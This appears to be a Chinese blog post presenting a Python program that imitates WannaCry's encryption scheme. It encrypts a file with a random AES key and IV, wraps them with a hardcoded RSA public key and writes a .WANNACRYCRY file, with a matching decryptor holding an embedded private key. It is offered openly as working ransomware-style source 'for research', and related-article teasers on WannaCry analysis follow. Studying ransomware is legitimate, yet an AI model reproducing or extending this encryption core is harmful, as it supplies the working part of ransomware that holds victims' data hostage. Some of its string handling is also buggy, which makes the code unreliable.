python加密解密算法_原来这么多人还不知道 WANNACRY 的加密算法啊,写了一个 Python 的加密和解密程序,仅供研究...

最新推荐文章于 2023-01-14 21:55:51 发布
最新推荐文章于 2023-01-14 21:55:51 发布
阅读量145 收藏
点赞数
文章标签: python加密解密算法

发现 V2 上讨论勒索病毒的同学不在少数啊,本人就着自己的理解写了一段给任意文件加密的程序和解密程序,代码量不多,也并不复杂。

本人学习 python 时间并不长,有啥错误的地方,欢迎大家指正和讨论。

大神轻拍~下面是代码

from Crypto.Cipher import AES

import random,rsa,os

x = [chr(y) for y in range(1,127)]

key = ''.join(random.sample(x,16))

iv = ''.join(random.sample(x,16))

RSA_public_string = u'-----BEGIN RSA PUBLIC KEY-----\nMIGJAoGBALvD8lK3bgYhRPD3ybKZlo4AJLe6WrXR8SEVY09+W9IXOfl1mCjkxkko\nbykxfevl84qMgrHbXB+7YWN9x5Mgw3jWxSsg1RJcWP+4WKvx/n7i6c4f9R6ndfEC\n4Upa4ElomhiBt426eaCm5zbnUO3i2jc358b/1oHtsLQKBl6qqatXAgMBAAE=\n-----END RSA PUBLIC KEY-----\n'

RSA_Pub_key = rsa.PublicKey.load_pkcs1(RSA_public_string)

Encrypt_key_iv = rsa.encrypt(key+iv, RSA_Pub_key)

Encrypt_key_iv_padding = Encrypt_key_iv+'\0'*(200-len(Encrypt_key_iv))

def Encrypt_File(PATH):

f = open(PATH,'rb')

filebuffsize = 100*1024*1024

w = open(PATH+'.WANNACRYCRY','wb')

AES_cryptor = AES.new(key,AES.MODE_CBC,iv)

w.write(Encrypt_key_iv_padding)

while True:

g = f.read(filebuffsize)

length = len(g)

if length == 0:

print 'done!!'

break

if length < filebuffsize:

g += (16-length%16)*'\0'

w.write(AES_cryptor.encrypt(g))

print 'done!!'

break

w.write(AES_cryptor.encrypt(g))

print '++go--->'

f.close()

w.close()

def Decrypt_File(PATH):

RSA_private_string = u'-----BEGIN RSA PRIVATE KEY-----\nMIICYAIBAAKBgQC7w/JSt24GIUTw98mymZaOACS3ulq10fEhFWNPflvSFzn5dZgo\n5MZJKG8pMX3r5fOKjIKx21wfu2FjfceTIMN41sUrINUSXFj/uFir8f5+4unOH/Ue\np3XxAuFKWuBJaJoYgbeNunmgpuc251Dt4to3N+fG/9aB7bC0CgZeqqmrVwIDAQAB\nAoGAdgw8ZnrCZoI2KNVwbqQXPpGihAxaiWNDmUwsEsdbjRtjLI4dKuCiNU6BjMF7\n7Hq3Ag1TAeTq51xUX0utOoj0MvWWR99ajF1E9zEEdSbptIXXV+eEwQYVZ3OOPBvh\ne2MeXEqc1cRdaMc7MjkfT8HVTdNybFign4fBtdY29uyM4dECRQD1PRDpw5t85He1\nrYk1vxtahMlKzwvpQrdJlInldn6cRxqZ72ZZjCNQFHY97dNIQ5iOPxg5GQX2n0Ej\n6oIu2Cw6tfdMCQI9AMQBPsY3xbW9du6ptruOOQyL2/oCSOs/M/o6cfpSUQX1Ijmo\nEe6gK/vErUajm/HgUEyMWpfHlSVBpsXUXwJFAMW906FqZDm0TwJjRzvbOMcoQtbb\nVBNmBDyEVRx9C2Ifw0dUTgbuhJrRpPYSika+mog4P+PqVXCiwPeg5A+5pxBAIYNh\nAjxivuHaSNTRV69oU5Yc7WzuVjOvw6Dq63+LLBCp9Pie0L26YGMQXh9qis5lDR4O\ngFzUA83MM59/EpErj28CRCrYQEUUHnbA4cJihxKV7ZusZ/30R0IInTeH3U+bzum5\nKan0fug4DN6IrKk89jQGvr3y6rGFluiG4LS1LO46Rh/Zj+wh\n-----END RSA PRIVATE KEY-----\n'

RSA_Private_Key = rsa.PrivateKey.load_pkcs1(RSA_private_string)

f = open(PATH,'rb')

w = open(PATH.rstrip('\.WANNACRYCRY'),'wb')

g = f.read(200).rstrip('\0')

key_iv_string = rsa.decrypt(g, RSA_Private_Key)

key = key_iv_string[:16]

iv = key_iv_string[16:]

AES_decryptor = AES.new(key,AES.MODE_CBC,iv)

filebuffsize = 100*1024*1024

while True:

g = f.read(filebuffsize)

length = len(g)

if length == 0:

print 'done!!'

break

if length < filebuffsize:

w.write(AES_decryptor.decrypt(g).rstrip('\0'))

print 'done!!'

break

w.write(AES_decryptor.decrypt(g))

print '--go--->'

f.close()

w.close()

Encrypt_File(r'E:\Movie\xxx.mp4')

Decrypt_File(r'E:\Movie\xxx.mp4.WANNACRYCRY')

按照一般分析,病毒作者是硬编码了 RSA 公钥在程序中,私钥掌握在自己手中,所以这只程序也按照病毒作者的方法来写。

以上。。

weixin_39927059
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[网络安全自学篇] 六十七.WannaCry勒索病毒复现及分析(一)Python利用永恒之蓝及Win7勒索加密
杨秀璋的专栏
04-14 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了Vulnhub靶机渗透的DC-1题目,通过信息收集、CMS漏洞搜索、Drupal漏洞利用、Metasploit反弹shell、提权及数据库爆破获取flag。这篇文章将分享新知识,最近WannaRen勒索软件爆发(下图是安天的分析攻击流程),其名称和功能与WannaCry相似,所以接下来作者将连续分享WannaCry勒索病毒的复现及分析,希望这篇基础性文章对您有所帮助。
自制处理wannacry
06-18
自制处理wannacry的批处理,简单封堵445等多个端口。可供机关使用
Wannacry病毒分析
datouyu0824的博客
03-20 2720
1.样本概况 1.1 样本信息 病毒名称:Wannacry 所属家族:WannaCrypt MD5值:DB349B97C37D22F5EA1D1841E3C89EB4 SHA1值:E889544AFF85FFAF8B0D0DA705105DEE7C97FE26 CRC32:9FBB1227 病毒行为概述: 1. 创建服务并已服务的方式启动,并释放tasksche.exe文件在系统目录下并启动 2. 设置服务主函数,在局域网,互联网内445端口连接SMB漏洞攻击 3. tasksche.e
WannaCry勒索病毒分析
ZK_1874的博客
10-28 4820
WannaCry勒索病毒分析
[网络安全自学篇] 七十三.WannaCry勒索病毒复现及分析(四)蠕虫传播机制全网源码详细解读
热门推荐
杨秀璋的专栏
05-05 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了逆向分析OllyDbg动态调试工具的基本用法,包括界面介绍、常用快捷键和TraceMe案例分析。这篇文章将继续详细讲解WannaCry蠕虫的传播机制,带领大家详细阅读源代码,分享WannaCry勒索病毒是如何传播感染的。作者分析该病毒一个月,一方面觉得自己技术菜,另一方面深知系统安全需要坚持,继续加油。希望文章对您有所帮助~
RSA.rar_RSA算法Python_python实现加密_rsa加密_加密_加密解密
09-20
综上所述,这个"RSA.rar"压缩包提供了一个完整的RSA加密解密解决方案,结合Python编程和GUI设计,让用户能够在本地环境中安全地进行数据加密解密。它是一个很好的学习资源,可以帮助开发者理解RSA算法的工作原理,...
加密解密_加密_python_解密_
10-04
在“白志文20176227第二次作业”这个文件中,很可能是包含了使用Python实现的这些简单加密解密算法代码示例。文件可能包括了函数定义、测试用例以及可能的加密解密过程的解释。通过阅读和分析这个作业,我们可以...
Python基于DES算法加密解密实例
09-21
主要介绍了Python基于DES算法加密解密实现方法,以实例形式分析了DES算法实现加密解密的相关技巧,需要的朋友可以参考下
python实现RSA加密(解密)算法
12-24
RSA是目前最有影响力的公钥加密算法,它能够抵抗到目前为止已知的绝大多数密码攻击,已被ISO推荐为公钥数据加密标准。 今天只有短的RSA钥匙才可能被强力方式解破。到2008年为止,世界上还没有任何可靠的攻击RSA算法...
SM4加解密.rar_python sm4密码_sm4 python_sm4 python_sm4加密密码学_sm4加密算法
07-15
实现SM4加密算法,密码学作业之一,利用python实现
WannaCry:勒索病毒WannaCry反编译
03-23
勒索病毒WannaCry反编译源码 勒索病毒WannaCry通过高危入侵“永恒之蓝”(EternalBlue)在世界范围内爆发,据报道包括美国,英国,中国,俄罗斯,西班牙,意大利,越南等百余个国家均遭受大规模攻击。 病毒名称(Virus Name):WannaCrypt,WannaCry,WanaCrypt0r,WCrypt,WCRY 加密文件类型(它要加密的文件类型是): .doc,.docx,.xls,.xlsx,.ppt,.pptx,.pst,.ost,.msg,.eml,.vsd,.vsdx,.txt,.csv,.rtf,.123和.wks ,.wk1,.pdf,.dwg,.onetoc2,.snt,.jpeg,.jpg,.docb,.docm,.dot,.dotm,.dotx,.xlsm,.xlsb,.xlw,.xlt 、. xlm,.xlc,.xltx,.xltm,.pptm
用于分析的wannacry加密模块
07-13
请注意!将压缩文件拖入虚拟机中运行,运行前将虚拟机网络设置为主机模式,关闭虚拟机中的杀毒软件,并保存快照以便于恢复快照! 该样本只有加密模块,没有网络传播模块。
WannaCry的深度分析
鬼手的博客
02-19 1万+
文章目录样本概况查壳基础分析基础静态分析查看字符串使用PEiD识别加密算法查看导入表查看资源段基础动态分析查看进程树注册表监控文件监控网络监控使用IDA和OD进行详细分析对wcry.exe病毒主程序的分析主体逻辑第一部分 初始化操作GetRandom 获取随机数SetReg 设置注册表项ReleaseFiles 释放资源文件WriteCwnry 入c.wnryExeCmdCommand 执...
勒索病毒WannaCry深度技术分析——详解传播、感染和危害细节
bilibili的博客
05-23 5193
病毒分析
永恒之蓝漏洞与勒索病毒Wannacry研究
不忘初心,护天下安全!
04-27 4072
永恒之蓝漏洞与Wannacry病毒家族
勒索病毒“WannaCry”复现
Lemon's blog
10-20 5118
漏洞简介 永恒之蓝利用Windows系统的SMB漏洞可以获取系统的最高权限,然后通过恶意代码扫描开放445端口的Windows系统;只要是被扫描到的Windows系统,只要开机上线,不需要用户进行任何操作,即可通过共享漏洞上传wannacry勒索病毒,远程控制木马等恶意程序。 漏洞复现 在复现过程中需要先做好防护,以免造成真机感染病毒,那就GG了 ...
干货分享|Linux版“永恒之蓝”远程代码执行漏洞技术分析
super_marie的博客
06-14 4373
一、漏洞描述   Samba是一套可使UNIX系列的操作系统与微软Windows操作系统的SMB/CIFS网络协议做连结的自由软件。这个漏洞使得Samba客户端可以主动上传共享库到Samba服务器同时加载并执行该动态库导出函数。   攻击者利用漏洞可以进行远程代码执行,具体执行条件如下:   1)系统开启了文件/打印机共享端口445   2)共享文件夹拥有入权限   3)恶意攻
病毒分析--WannaCry分析--1
cyynid的博客
01-14 2536
分析监控的日志以及自行观察操作之后,可以分析出样本的恶意行为:自我复制样本到C盘:C:\ProgramData目录下,启动C:\ProgramData\@WanaDecryptor@.exe(即病毒程序)释放了并运行了taskeche.exe程序3.在程序目录下创建@Please_Read_Me@.txt、@WanaDecryptor@.exe以及.WNCRY文件4.在C:\ProgramData目录下创建xxx文件夹(文件名随机)5。
Wannacry浅析
weixin_46286477的博客
10-27 904
Wannacry浅析 今年刚刚接触病毒分析,学一个东西最好的方式就是先提问,带着问题分析会抓住做一些自己关注的重点。随着学习的深入,问题也会越来越高深。现阶段我的问题是,恶意代码是如何传播的,如何在受害者上运行的,有什么网络特征,是否加壳。对于勒索病毒:勒索病毒使用什么加密方式,加密后是否擦除,是否可以通过逆向方式找到密钥,如何找到密钥。
python加密解密算法
最新发布
03-20
Python中有很多加密解密算法可供使用,以下其中几种常见的算法: 1. 对称加密算法:对称加密算法使用相同的密钥进行加密解密。常见的对称加密算法有AES(Advanced Encryption Standard)和DES(Data Encryption ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值